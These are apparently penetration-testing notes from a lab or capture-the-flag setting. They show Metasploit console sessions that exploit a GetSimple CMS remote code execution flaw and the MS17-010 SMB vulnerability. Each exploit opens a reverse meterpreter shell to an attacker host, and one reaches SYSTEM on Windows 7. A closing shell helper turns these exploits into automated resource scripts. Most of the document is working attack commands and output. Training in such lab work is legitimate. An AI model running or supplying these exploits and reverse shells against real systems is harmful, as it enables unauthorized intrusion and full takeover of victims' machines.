METASPLOIT
SETUP
root@oco:~$ msfconsole
...
//Configure Target Settings
[msf](Jobs:0 Agents:0) >> search exploit "GetSimple CMS"
Matching Modules
================
   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   1  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE
[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) >> show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the cms
   VHOST                       no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  209.151.155.117  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   GetSimpleCMS 3.3.15 and before
[msf](Jobs:0 Agents:0) >> set RHOSTS 10.129.42.249
RHOSTS => 10.129.42.249
[msf](Jobs:0 Agents:0) >> set RPORT 80
RPORT => 80
//Configure Payloads
[msf](Jobs:0 Agents:0) >> set LHOST 10.10.14.57
LHOST => 10.10.14.57
[msf](Jobs:0 Agents:0) >> set LPORT 4444
LPORT => 4444
[msf](Jobs:0 Agents:0) >> exploit
[*] Started reverse TCP handler on 10.10.14.57:43213
[*] Sending stage (40004 bytes) to 10.129.42.249
[*] Meterpreter session 1 opened (10.10.14.57:43213 -> 10.129.42.249:46344) at 2025-06-30 19:08:08 -0500
[msf](Jobs:0 Agents:0) >> search payload "shell_reverse"
...
   19  payload/generic/shell_reverse_tcp  normal  No  Generic Command Shell, Reverse TCP Inline
EXPLOITATION
root@oco:~$ msfconsole
msf6> search exploit smb
msf6> use exploit/windows/smb/ms17_010_psexec
msf6> show options
msf6> set RHOSTS 10.10.10.40
msf6> set LHOST tun0
msf6> exploit
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49159) at 2020-12-27 01:13:28 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 39640 created.
Channel 0 created.
Windows 7 Professional 7601 Service Pack 1
(C) Copyright 1985-2009 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
* RHOSTS is the target host (or hosts) the exploit is sent to
* LHOST is the attack box: the address, or interface name such as tun0, that the reverse handler listens on; check it with show options before running exploit, because the default is auto-detected and may be the wrong interface
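The two transcripts above run the same procedure by hand: search, use, set RHOSTS/LHOST/LPORT, exploit. The helper below is an added example, not code from the original notes or from Metasploit: a hypothetical msf_rc function that turns those settings into an msfconsole resource script (the .rc file format msfconsole -r consumes), validating RHOSTS, LHOST and LPORT before they reach the console so a typo like a missing LPORT value or an out-of-range octet fails early rather than producing a handler on an unintended port. It also takes an optional payload override, which is how the generic/shell_reverse_tcp payload from the search above would be selected instead of the module default. The module names and addresses are the ones from the notes; the check and exploit -z lines are assumptions about what a non-interactive run should do (run the module's check first, then exploit without dropping into the session).

```shell
#!/bin/sh
# Added example (hypothetical helper, not part of Metasploit or the original notes):
# generate an msfconsole resource script from the settings the notes set interactively.

# valid_ipv4 ADDR -> 0 if ADDR is a dotted quad with every octet in 0..255
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS
  IFS=.
  set -- $1            # split the address into its four octets
  IFS=$old_ifs
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# valid_port PORT -> 0 if PORT is an integer in 1..65535
valid_port() {
  echo "$1" | grep -Eq '^[0-9]+$' || return 1
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# msf_rc MODULE RHOSTS LHOST LPORT [PAYLOAD]
# Prints resource-script lines on stdout; returns 1 (with a message on stderr)
# if any value is malformed. LHOST may be an IPv4 address or an interface name
# such as tun0, as the module option text allows.
msf_rc() {
  module=$1; rhosts=$2; lhost=$3; lport=$4; payload=$5
  valid_ipv4 "$rhosts" || { echo "bad RHOSTS: $rhosts" >&2; return 1; }
  case "$lhost" in
    *[!0-9.]*)  # contains something other than digits and dots: treat as an interface name
      echo "$lhost" | grep -Eq '^[a-z][a-z0-9]*$' || { echo "bad LHOST: $lhost" >&2; return 1; } ;;
    *)
      valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; } ;;
  esac
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }

  printf 'use %s\n' "$module"
  if [ -n "$payload" ]; then
    printf 'set PAYLOAD %s\n' "$payload"   # override the module's default payload
  fi
  printf 'set RHOSTS %s\n' "$rhosts"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set LPORT %s\n' "$lport"
  printf 'check\n'        # both modules in the notes support check (Check: Yes)
  printf 'exploit -z\n'   # -z: do not interact with the session after exploitation
}

# Usage (prints the script; redirect to a file and run: msfconsole -q -r getsimple.rc).
# The addresses are the ones from the notes above.
msf_rc exploit/multi/http/getsimplecms_unauth_code_exec 10.129.42.249 10.10.14.57 4444
msf_rc exploit/windows/smb/ms17_010_psexec 10.10.10.40 tun0 4444 generic/shell_reverse_tcp
```

Validation happens before anything touches msfconsole, so a bad value is reported by the shell and no resource script is produced; the generated file is plain text, so it can be reviewed and kept with the engagement notes as a record of exactly what was run.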